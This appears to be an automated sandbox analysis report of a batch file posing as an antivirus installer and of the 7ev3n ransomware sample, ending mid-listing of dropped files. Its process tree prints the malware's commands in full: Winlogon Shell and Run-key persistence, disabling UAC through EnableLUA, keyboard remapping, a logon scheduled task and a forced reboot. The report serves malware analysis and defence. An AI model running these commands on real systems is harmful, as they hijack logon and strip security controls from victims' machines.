Analysis
-
max time kernel
697s -
max time network
698s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
19-04-2024 16:55
Static task
static1
Behavioral task
behavioral1
Sample
FA Installer.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FA Installer.bat
Resource
win10v2004-20240412-en
Errors
General
-
Target
FA Installer.bat
-
Size
42KB
-
MD5
ac48f9875234a4e5649d152672903198
-
SHA1
6795362296194a79770a385a1a81efa89c6fe203
-
SHA256
e5f0efdb833e0b8ec06d88d13039ac9ab2b46a70a26a6c9c07868a79b8f11f62
-
SHA512
b5a8cf484eca8afde45a78b6768970a3ccd9f4731f4f9a227ac22e02cb3c9c158c8221c136fef191ce9967b2b4bc8c7f4aa6a4310e04dc5e3e5b8b7fc712df44
-
SSDEEP
768:lnwnjP9zogqnrT9AHuhUcKhnuxGTBmF5p8yJVS5LTf+iA0:FI89nf9tUc+nuxGIFwyKhTf+r0
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
system.exepid process 752 system.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
Processes:
flow ioc 200 camo.githubusercontent.com 208 camo.githubusercontent.com 209 camo.githubusercontent.com 211 camo.githubusercontent.com 226 raw.githubusercontent.com 227 raw.githubusercontent.com 228 raw.githubusercontent.com 229 raw.githubusercontent.com 225 raw.githubusercontent.com 230 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 13 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 1240 timeout.exe 1456 timeout.exe 4508 timeout.exe 1296 timeout.exe 3576 timeout.exe 5100 timeout.exe 1892 timeout.exe 1304 timeout.exe 3944 timeout.exe 3996 timeout.exe 2704 timeout.exe 2592 timeout.exe 4584 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4324 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "237" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe -
Modifies registry class 4 IoCs
Processes:
cmd.exefirefox.execmd.exeOpenWith.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings OpenWith.exe -
NTFS ADS 1 IoCs
Processes:
firefox.exedescription ioc process File created C:\Users\Admin\Downloads\7ev3n.zip:Zone.Identifier firefox.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2244 powershell.exe 2244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exefirefox.exetaskkill.exeshutdown.exedescription pid process Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 1132 firefox.exe Token: SeDebugPrivilege 1132 firefox.exe Token: SeDebugPrivilege 1132 firefox.exe Token: SeDebugPrivilege 4324 taskkill.exe Token: SeShutdownPrivilege 3772 shutdown.exe Token: SeRemoteShutdownPrivilege 3772 shutdown.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
firefox.exepid process 1132 firefox.exe 1132 firefox.exe 1132 firefox.exe 1132 firefox.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
firefox.exepid process 1132 firefox.exe 1132 firefox.exe 1132 firefox.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
firefox.exeOpenWith.exeLogonUI.exepid process 1132 firefox.exe 1132 firefox.exe 1132 firefox.exe 1132 firefox.exe 4484 OpenWith.exe 1536 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exefirefox.exefirefox.exedescription pid process target process PID 1684 wrote to memory of 684 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 684 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 4012 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 4012 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 4776 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 4776 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 3916 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 3916 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 3896 1684 cmd.exe cmd.exe PID 1684 wrote to memory of 3896 1684 cmd.exe cmd.exe PID 1684 wrote to memory of 3944 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 3944 1684 cmd.exe timeout.exe PID 3896 wrote to memory of 2244 3896 cmd.exe powershell.exe PID 3896 wrote to memory of 2244 3896 cmd.exe powershell.exe PID 1684 wrote to memory of 1456 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1456 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 5100 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 5100 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 4508 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 4508 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1296 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1296 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1892 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1892 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 3576 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 3576 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 2704 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 2704 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1304 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1304 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1240 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 1240 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 3996 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 3996 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 2628 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 2628 1684 cmd.exe WScript.exe PID 1684 wrote to memory of 2592 1684 cmd.exe timeout.exe PID 1684 wrote to memory of 2592 1684 cmd.exe timeout.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1368 wrote to memory of 1132 1368 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe PID 1132 wrote to memory of 1136 1132 firefox.exe firefox.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FA Installer.bat"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAinfo4.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAinfo3.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAinfo2.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAinfo1.vbs"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\FA_Antivira\FAshortcutinstallerdesktop.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\Desktop\FA Security.lnk');$s.TargetPath='C:\FA_Antivira\Fabi_Antivira_Securety.bat';$s.Save()"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAwlc.vbs"2⤵
-
C:\Windows\system32\timeout.exetimeout /t 602⤵
- Delays execution with timeout.exe
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.0.2052635877\1622097830" -parentBuildID 20230214051806 -prefsHandle 1772 -prefMapHandle 1764 -prefsLen 22244 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e54d9ee-7ee0-4365-916f-53df822b8f96} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 1852 1810522d758 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.1.76159362\300292943" -parentBuildID 20230214051806 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 22280 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f402f48-2618-427d-836a-c05e4ee374ac} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 2420 1810577a458 socket3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.2.869977666\400153086" -childID 1 -isForBrowser -prefsHandle 3016 -prefMapHandle 2820 -prefsLen 22318 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60645fe7-9d7f-4661-9639-a682db2d5760} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 2740 18107bf3d58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.3.174865325\309931989" -childID 2 -isForBrowser -prefsHandle 3480 -prefMapHandle 1360 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf9139b2-4c75-418d-aa71-9e55d2c6f000} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 3768 1810a365658 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.4.963962890\749644247" -childID 3 -isForBrowser -prefsHandle 4888 -prefMapHandle 4864 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd50c3e5-eebc-4f94-baca-28e6da3f7f00} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 4828 1810cc86558 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.5.1845527900\1414269610" -childID 4 -isForBrowser -prefsHandle 5244 -prefMapHandle 5248 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54741bf6-6264-4051-ace5-0de871294eed} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 5236 1810cc87d58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.6.116301782\1855921897" -childID 5 -isForBrowser -prefsHandle 5440 -prefMapHandle 5444 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7a519bd-71ea-4102-b905-5c9ceb5ede91} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 5428 1810cc89558 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.7.2024065354\1970252890" -childID 6 -isForBrowser -prefsHandle 5872 -prefMapHandle 2692 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f29fea3b-3e3e-4c0a-b59a-ce13b89cd610} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 5024 1810acba158 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1132.8.1318373792\1904729572" -childID 7 -isForBrowser -prefsHandle 6076 -prefMapHandle 6080 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1204 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0da376a4-f7c0-4c33-a281-acffeba05f76} 1132 "\\.\pipe\gecko-crash-server-pipe.1132" 2548 1810dd5a258 tab3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\Endermanch@7ev3n.exe"C:\Users\Admin\Desktop\Endermanch@7ev3n.exe"1⤵
-
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat3⤵
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- Modifies WinLogon for persistence
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- Adds Run key to start application
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵
- UAC bypass
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:644⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f3⤵
-
C:\Windows\SysWOW64\shutdown.exeshutdown -r -t 10 -f4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\FA_Antivira\Fabi_Antivira_Securety.bat" "1⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAwlc.vbs"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\FA_Antivira\FASecLogsTxT\FAupLOG.bat"2⤵
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\FA_Antivira\FAvbs\FAbuttenUser.vbs"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\FA_Antivira\FAcmd.bat"2⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cmd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38f7055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\FA_Antivira\FASecLogsTxT\FAupLOG.batFilesize
466B
MD50ea60cedc7c561c2b3eceb58339f3bb2
SHA11c500a5b3625aec2d3f1b2a204b921b5e85c45ae
SHA256957680d4b0ac571bdf53e789855625ca7c68bad067f02b8fc9a7ab74355cfe51
SHA512c479cc265cf906b50f03a46571cb28471511f1cee4e35674ac968f73fc68bad972329a825fc1d9fce4bf11ad8cc624bcdbc0a7fe751711f1ae0ed53a8236b597
-
C:\FA_Antivira\FASecLogsTxT\FAupLOGlogFile.txtFilesize
37B
MD5ae979d24978650602269edd6a04b47a2
SHA183ab3fdb4097c51e397e822b0947929125d435fe
SHA256570fc53be64d998ddda6b74994f8a041bb678f01e80c4eb6280b6f4b5d98f97d
SHA512c8387c70bc93de262a8b236854b8817b2f710a1ed95d24d1a294554c10b36af27b0e6799c90c6797d88aed6ea604dfdf113240e055b7279d8a4e8530563168f4
-
C:\FA_Antivira\FAcmd.batFilesize
26B
MD5c4645d6e11ab471b8e0d246a285ca38f
SHA1cfb73001deb5265fd23118ea7c92b069726e0744
SHA256d3e398863bb562e0d6df0915b463e633dbb25947728fb2c5ea097c28a063491d
SHA512b0e49f720ce0738a5f77fd2e1e7383756ebcba77afb71c2d3c3962c0ef1d5a7054bed41963801fc570ec468ddf8a10c38756b9b3ed341b3c18d5a714640886ee
-
C:\FA_Antivira\FAhelp.txtFilesize
494B
MD5701f41ce7ce621d1536b42b84c048070
SHA1248b92527e022dd24022498d73f20f1d3b7b0077
SHA256ca05e47b3bc4a77687459f024fde354121d9dde33fed335c904b25bcef2dbeea
SHA512a26b9a615bef2991e9cd1d89f54552daf8a2970006b01fc4337f1e115454c3851f8306aac6c9cbafe2e523529cd04fce952d57d7db89be81ad8400a58202578d
-
C:\FA_Antivira\FAinfo.txtFilesize
86B
MD53bb958c0095d3bb7ae43fd80757f885b
SHA171be6a114f3d5ff211b14b0c434ba4ab89bf5257
SHA256457805e633ef790a62df6a11aa371b4352f4df14ac653fc5898defab01fec048
SHA512ccba11c26c45ecbd815ae4ac8de788b216f64803a9151345f359a7ff2982daa486d737e015e65929842b52a624742703bd6d4a511de32dce8918719c310cc2f6
-
C:\FA_Antivira\FAinfo1.vbsFilesize
84B
MD5fad7cd2a49837444cde4548abdf478b6
SHA1376a4ff6acc6ca44f2b660286633c5a31eddd764
SHA2569c08b7d014ab766305e4525478bf8a1bc2f8cbe4f04aedf38f7daa0660ba3cda
SHA512287223fdf6ec6347c37b51fc7913ab8931d1fe87c03fae93e1cf8bcacf1b4a2dc13605b08506a0299e5536fac5b02fc15ab387781b5b16873ea3c686daa81cc5
-
C:\FA_Antivira\FAinfo2.vbsFilesize
87B
MD55a1fc5e5db483c5926a50ee931581cd9
SHA1419644277a92e109d4ce6739a0d5e2d0ba8f2d42
SHA2560f79e391fe889e01a6ef37619023af6672e98f1551753a10021efda8dee607ab
SHA5120351928a53a5586c560e8155d99eb1838c873cbc2b554ae25c6be1433cdae41cea7508b60c016e23e0d2687d99bcc96066bc72f15c1ffb922f348f81e044c240
-
C:\FA_Antivira\FAinfo3.vbsFilesize
71B
